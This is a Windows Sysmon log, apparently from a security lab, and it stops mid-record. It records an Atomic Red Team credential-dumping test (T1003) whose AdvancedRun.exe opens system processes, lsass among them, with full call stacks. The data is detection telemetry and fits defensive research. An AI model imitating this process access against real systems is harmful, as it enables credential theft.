17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003951986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003951985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003951983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003951982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003951981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003951980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003951979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003951977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003951975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951973Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTe